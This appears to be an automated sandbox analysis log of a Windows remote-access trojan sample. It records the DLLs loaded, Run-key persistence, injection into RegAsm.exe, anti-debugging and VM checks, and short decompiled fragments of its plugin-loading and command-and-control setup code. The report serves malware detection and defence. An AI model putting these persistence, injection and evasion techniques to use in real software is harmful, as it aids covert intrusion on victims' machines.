                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, Messages.cs.Net Code: Memory
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002CB170 _Smanip,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_002CB170
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeStatic PE information: section name: .fptable
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.0.drStatic PE information: section name: .fptable
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D54DD push ecx; ret 0_2_002D54F0
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD54DD push ecx; ret 2_2_00CD54F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_053179B0 pushfd ; ret 3_2_053179B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674E6E0 push eax; retf 3_2_0674E6E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674E6EA push eax; retf 3_2_0674E6E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674CDE8 push esp; ret 3_2_0674CDE9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0674CDD4 push esp; ret 3_2_0674CDDD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07B28960 pushad ; iretd 3_2_07B28981
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_07BF4F05 push FFFFFF8Bh; iretd 3_2_07BF4F07
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeFile created: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AutoStartAppJump to behavior
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AutoStartAppJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002CB170 _Smanip,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_002CB170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\78601CBA8DD4C8D8F863 CC52384910CEE944DDBCC575A8E0177BFA6B16E3032438B207797164D5C94B34Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9587Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeAPI coverage: 9.2 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5768Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002E895D FindFirstFileExW,0_2_002E895D
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CE895D FindFirstFileExW,2_2_00CE895D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000621000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg
                Source: RegAsm.exe, 00000003.00000002.1456316118.0000000005FF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D9423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D9423
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002CB170 _Smanip,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,0_2_002CB170
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002EBC10 GetProcessHeap,0_2_002EBC10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D9423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D9423
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D5772 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002D5772
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D58FE SetUnhandledExceptionFilter,0_2_002D58FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 0_2_002D59CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002D59CC
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD9423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CD9423
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD5772 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CD5772
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD58FE SetUnhandledExceptionFilter,2_2_00CD58FE
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeCode function: 2_2_00CD59CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00CD59CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
